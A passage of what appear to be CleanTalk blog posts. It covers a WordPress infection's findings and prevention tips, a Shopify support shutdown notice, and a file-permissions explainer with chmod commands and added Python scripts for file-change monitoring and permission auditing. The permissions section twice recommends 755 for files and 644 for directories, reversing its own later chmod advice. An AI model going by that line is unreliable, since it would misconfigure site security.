    • the file «index.php» was modified, with obfuscated malicious code added;
    • the file «plugins.php» was modified, with obfuscated malicious code added;
    • the file «pluggable.php» was modified, with obfuscated malicious code added;
    • the files contained eval constructions that could not be parsed;
    • the origin of the folder /wp-content/themes/seotheme and the files in it also cannot be determined, because the malware deleted the traces of its own activity.

    How to prevent future hacks:

    1. constantly monitor the website files for any new, unknown files in the system;
    2. respond aggressively to status changes of «.htaccess» files if you use an Apache web server;
    3. force all filesystem actions to go through a protected FTP account only; to do this, add the code below to your wp-config.php:
    define( 'FS_METHOD', 'ftpext' );
    define( 'FTP_BASE', '/yoursitepath' );
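    For the first two points, an added example (not CleanTalk's code) of a baseline-and-compare check in Python: it hashes every file under the WordPress root, then reports new, modified and deleted files and singles out any «.htaccess» that appeared or changed. The sample tree is constructed in a temporary directory and replays the kinds of changes seen in the incident.

```python
"""Baseline-and-compare monitor for a WordPress tree: reports new, modified and
deleted files, and separately any .htaccess that appeared or changed. Added
example, not CleanTalk's code; the sample tree is constructed in a temp dir."""
import hashlib
import os
import tempfile

def snapshot(root):
    """Map each file (path relative to root) to (sha256 hex digest, permission bits)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root)] = (digest, os.stat(full).st_mode & 0o777)
    return manifest

def compare(baseline, current):
    """Return the changes a monitor should alert on, grouped by kind."""
    new = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    deleted = sorted(p for p in baseline if p not in current)
    # .htaccess gets its own bucket: on Apache a changed one can make uploads executable.
    htaccess = sorted(p for p in new + modified if os.path.basename(p) == ".htaccess")
    return {"new": new, "modified": modified, "deleted": deleted, "htaccess": htaccess}

def _write(root, rel, text, mode=0o644):
    """Create or overwrite a file under root (helper for the constructed tree)."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)
    os.chmod(full, mode)

def demo():
    """Baseline a clean tree, then replay the kinds of changes seen in the incident above."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php // clean\n")
        _write(root, "wp-includes/pluggable.php", "<?php // clean\n")
        _write(root, "wp-content/uploads/.htaccess", "php_flag engine off\n")
        base = snapshot(root)
        _write(root, "wp-content/themes/seotheme/db.php", "<?php /* dropped */\n")  # new file
        _write(root, "index.php", "<?php /* obfuscated blob */\n")                  # modified
        _write(root, "wp-content/uploads/.htaccess", "php_flag engine on\n")        # altered
        return compare(base, snapshot(root))
```

In production the baseline would be stored off the web server and `compare` run on a schedule; a non-empty `htaccess` or `new` list is the alert condition from points 1 and 2.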
  • CleanTalk is Ending Support of the Anti-Spam Service for Shopify

    The CleanTalk company informs you, our clients, that starting on December 12, 2022, we will stop providing and supporting the Anti-Spam service for Shopify.

    The CleanTalk Anti-Spam service for Shopify was launched so that the anti-spam protection features could be tested for free. To our regret, we cannot provide our full protection because of technical limitations.

    The Shopify platform restricts app developers: there is no way to run our own JavaScript code and no access to the other technical parameters of websites. Because of this, our service cannot collect the parameters needed for full protection from spam, so the CleanTalk service works only partially and, for now, anti-spam protection cannot be implemented for some website forms.

    On December 12, 2022 our Anti-Spam plugin for Shopify will stop functioning, therefore we recommend deleting it and installing another app.

    We hope for your understanding; if the situation changes, we will return to developing and supporting fully functional protection from spam for Shopify.

    We appreciate that you were with us and trusted us to protect your websites!

    If you have any questions, please send us a ticket.

  • Checking your WordPress files and folders permissions with Website Security

    The Website Security plugin now automatically scans your WordPress files and folders for unsafe permissions and recommends how to change them if necessary.

    What are WordPress File Permissions

    WordPress file permissions protect your site’s files and directories from unauthorized access by hackers. Setting the proper permissions adds a layer of security to your site and makes it less vulnerable.

    There are 3 types of file permissions in WordPress: read, write, and execute. They are denoted in 2 ways; one of them is numerical.

    Permission      What it means                                                                   Notation
    Read            User can view the contents of a file or directory, but not change anything      4
    Write           User allowed to modify the contents of a file or directory, but not execute it  2
    Execute         User allowed to run script files, or run scripts inside a directory             1
    No permission   User has no access to the file or directory                                     0

    Also, there are 3 categories of roles: user owner (a single account), group owner (a set of users), and world (every other user). So, in the numeric schema, each role’s digit is the sum of the permissions granted to that role. Here are 4 examples of how a file or folder permission is recognized by WordPress:

    Mode   User                    Group                   World
    777    Read, Write, Execute    Read, Write, Execute    Read, Write, Execute
    644    Read, Write             Read                    Read
    755    Read, Write, Execute    Read, Execute           Read, Execute
    440    Read                    Read                    (none)

    While 000 or 440 may seem to be the safest file permissions, they are impractical. As you can see, 777 is very dangerous, as it leaves the file or directory open to modification by any user.

    How to scan my website for unsafe permissions

    The Website Security plugin automatically scans your website every 24 hours and checks all the permissions of the files and folders. Here is a list of all the files the plugin checks.

    /.htaccess
    /index.php
    /wp-config.php
    /wp-admin
    /wp-includes
    /wp-content
    /wp-content/themes
    /wp-content/plugins
    /wp-content/uploads

    You can see the results of your last scan on the main page of the plugin: go to Settings > Security by CleanTalk in your side menu. When you enter this page, a scan is started immediately to give you the most up-to-date information about your site’s security.

    If there are unsafe permissions, you will see the message:

    Permissions for files and directories from the list are unsafe. We recommend change it to 755 for each file and 644 for each directory from the list.

    In that case, follow the instructions in the message: 755 for files and 644 for directories is always recommended.

    How to change access rights (using Linux as an example)

    The Linux permissions for all files in your WordPress base directory should be set to readable and writable by the owning user (you), and readable only by everyone else. This creates a baseline where the web server can read all files; it needs read access in order to serve static content like images, CSS and JavaScript files. Unlike the method above, we will tighten script permissions further on.

    find </path/to/wordpress> -type f -exec chmod 644 {} \;

    If possible, the permissions for all files should be set to readable and writable by your user, readable by the group, and with no permissions for others. In some instances this may cause issues with other software or plugins, but in many cases it is possible to restrict permissions this far.

    Lock down permissions for all PHP scripts so that only your user can read them. This is ideal because only your user should need to know the contents of the scripts.

    find </path/to/wordpress> -type f -name "*.php" -exec chmod 640 {} \;
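    An added example (not the Website Security plugin's code) that decodes an octal mode into the per-role table above and audits the plugin's list of checked paths for unsafe bits. The policy it applies follows the chmod commands above (no group or world write, no execute bit on files, PHP scripts at 640), and the tree it checks is constructed in a temporary directory with one safe config file, a 777 index.php and a 777 uploads directory.

```python
"""Decode octal modes as in the table above and audit the paths the plugin checks.
Added example, not the plugin's code; the tree is constructed in a temp dir and the
policy follows the chmod steps above (no group/world write, no exec on files, PHP 640)."""
import os
import tempfile

BITS = ((4, "Read"), (2, "Write"), (1, "Execute"))
CHECKED = [".htaccess", "index.php", "wp-config.php", "wp-admin", "wp-includes",
           "wp-content", "wp-content/themes", "wp-content/plugins", "wp-content/uploads"]

def describe_mode(mode):
    """'644' -> {'user': ['Read', 'Write'], 'group': ['Read'], 'world': ['Read']}"""
    digits = [int(d) for d in str(mode).zfill(3)[-3:]]
    return {role: [name for bit, name in BITS if digit & bit]
            for role, digit in zip(("user", "group", "world"), digits)}

def mode_issues(path, mode):
    """Reasons this mode is unsafe for this path; an empty list means it passes."""
    user, group, world = (mode >> 6) & 7, (mode >> 3) & 7, mode & 7
    issues = []
    for bits, who in ((world, "world"), (group, "group")):
        if bits & 2:
            issues.append(f"{who}-writable")
    if os.path.isfile(path):
        if (user | group | world) & 1:
            issues.append("executable file")  # PHP is run by the server, never via the shell
        if path.endswith(".php") and world & 4:
            issues.append("PHP source readable by others")  # the chmod 640 step above fixes this
    return issues

def audit(root):
    """{checked path: (octal mode, issues)} for every listed path that exists under root."""
    report = {}
    for rel in CHECKED:
        full = os.path.join(root, rel)
        if os.path.lexists(full):
            mode = os.stat(full).st_mode & 0o777
            report[rel] = (format(mode, "o"), mode_issues(full, mode))
    return report

def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in (("wp-content", 0o755), ("wp-content/uploads", 0o777)):
            os.makedirs(os.path.join(root, rel))
            os.chmod(os.path.join(root, rel), mode)
        for rel, mode in (("wp-config.php", 0o640), ("index.php", 0o777), (".htaccess", 0o644)):
            open(os.path.join(root, rel), "w").close()
            os.chmod(os.path.join(root, rel), mode)
        return audit(root)
```

Pointing `audit` at a real WordPress root lists each checked path with its mode and the reasons it fails; paths absent from the install are simply skipped.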

    Also, feel free to use the Security by CleanTalk plugin to check wp-content automatically on a daily basis.